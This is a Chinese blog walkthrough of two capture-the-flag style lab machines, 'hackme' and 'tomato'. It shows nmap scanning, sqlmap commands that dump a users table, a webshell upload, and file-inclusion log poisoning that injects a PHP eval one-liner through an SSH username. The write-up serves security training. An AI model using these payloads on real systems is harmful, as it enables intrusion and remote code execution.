首页 > 其他分享 >文件包含漏洞(hackme和tomato靶机实战)

文件包含漏洞(hackme和tomato靶机实战)

时间:2024-12-22 22:29:54浏览次数:10  
标签:tomato sqlmap 文件 -- IP 扫描 靶机 hackme

hackme靶机

1.扫描靶机IP

靶机搭好后

扫描我们靶机的IP

nmap -O 192.168.187.128/24

扫描到靶机的IP后去访问他

2.信息收集

挨个访问后有文件上传的路径;uploads

网站登录界面;login.php

3.寻找薄弱点

网页首页是个登录界面,注册个账号登录看看

登录后的界面

判断是否存在SQL注入

发现是字符型注入

4.漏洞利用

sqlmap一跑就出来了

#手工sqlmap
python sqlmap.py -r 1.txt --dbs --tables --columns --batch
  python sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch

发现了superadmin去md5解密获取密码

Uncrackable

5.获取shell

登陆后来到了文件上传

上传我们的木马文件

蚁剑连接

\

连接成功

tomato靶机

1.扫描靶机IP

靶机搭好后

扫描我们靶机的IP

扫描到靶机的IP后去访问他

2.信息收集

有一个目录网站

3.寻找薄弱点

在phpinfo中可以看到网站的绝对路径和当前用户

phpinfo源代码有给include的函数

4.漏洞利用

利用一下include函数去尝试读取其他文件

读取到了就来看一下日志文件

我们可以利用报错连接来运行我们的一句话

利用MobaXterm来连接SSH

这就可以了

或者用kali输入命令

ssh '<?php @eval($_POST[cmd]);?>'@192.168.187.131 -p 2211

连接成功

标签:tomato,sqlmap,文件,--,IP,扫描,靶机,hackme
From: https://blog.csdn.net/2302_80256359/article/details/144653885

相关文章

  • Tomato 靶机(通关攻略)
    点击开启靶机去kali终端输入arp-scan-l//扫描靶机IP扫出靶机IP192.168.131.171第一步:信息收集端口扫描nmap-p-192.168.131.171敏感目录扫描dirbhttp://192.168.131.171总结:IP:192.168.168.131开放端口:21、80、2211、8888敏感目录:http://192.168.168.1......
  • 文件包含tomato靶机通关和文件上传hackme靶机通关
    文件包含tomato靶机通关靶机地址:192.168.152.152注:靶机打开后在kali中扫描一下就能得到打开网站第一步信息收集将网址放到dirb中扫描一下得到了三个目录我们挨个访问一下第一个是主目录第二个是主页面第三个报错第二步我们在主目录页面继续访问......
  • tryhackme-Pre Security-What is Networking?(计算机网络基础)
    任务一:WhatisNetworking?(什么是网络)网络就是连接的事物,在计算机中,网络也是相同的概念的,只不过说,他分撒在了各种设备上面,通过这些设备连接,并且遵循一定的规则,我们可以交流。显然答案就是:网络任务二: WhatistheInternet?(什么是互联网)根据上面我了解到了什么是网络 ,也......
  • #oscp#渗透测试 kioptix level 3靶机getshell及提权教程
    声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!一、靶机搭建点击扫描虚拟机选择靶机使在文件夹即可二、信息收集前言信息收集阶段,因为这里是靶机,所以不需要做什么,但是实际渗透测试中,大家一定要学会正确的隐藏......
  • CFS靶机三层(2)
    在上篇里面靶机已经搭建好了,如果出现什么问题,请详细查看我的配置主要是照着【VulnHub靶场】——CFS三层靶机内网渗透实操_cfs靶场下载-CSDN博客CFS三层靶机渗透_Kali版_cfs三层靶机下载-CSDN博客大佬们的文章去复现的*C**entos**信息收集**G**et**shell*访问80是thinkph......
  • DC3靶机渗透测试
    *概述**测试目的**测试范围*序号系统IP1本地192.168.152.1282靶机192.168.152.133*详细测试流程**1、发现测试目标**2、信息收集*开放了80端口,是Joomla服务扫描目录利用joomscan工具探测服务版本Joomscan工具利用方法:https://cn.linux-console.......
  • CFS靶机三层(1)
    *搭建环境**下载解压*【网盘链接】https://pan.baidu.com/s/1slqp3878JawT_QDrzyC7Ig?pwd=9da6靶场就在刚才的网盘链接中,下载之后有很多个7z文件,按照下面的步骤合并解压下载完是很多个7z格式的压缩文件,直接合并解压就行,就是用copy/bCFS三层靶机环境.7z*靶机.7z命令把下载......
  • #渗透测试#红队攻防 kioptix level 2靶机getshell及提权
    声明!文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!目录标题一、准备阶段1.找出ip端口和服务信息扫出ip扫出端口端口对应服务信息2.目录扫描3.漏洞扫描nmap扫描漏洞searchsploit查找漏洞二、获取权限1.访......
  • 红日靶场vulnstark 5靶机的测试报告
    目录一、测试环境1、系统环境2、注意事项3、使用工具/软件二、测试目的三、操作过程1、信息搜集2、thinkPHP漏洞利用3、CS上线web靶机4、内网信息收集5、横向移动6、权限维持7、痕迹清理四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.200.131)......
  • Tr0ll: 1 Vulnhub靶机渗透笔记
    Tr0ll:1Vulnhub靶机渗透笔记本博客提供的所有信息仅供学习和研究目的,旨在提高读者的网络安全意识和技术能力。请在合法合规的前提下使用本文中提供的任何技术、方法或工具。如果您选择使用本博客中的任何信息进行非法活动,您将独自承担全部法律责任。本博客明确表示不支持、不鼓......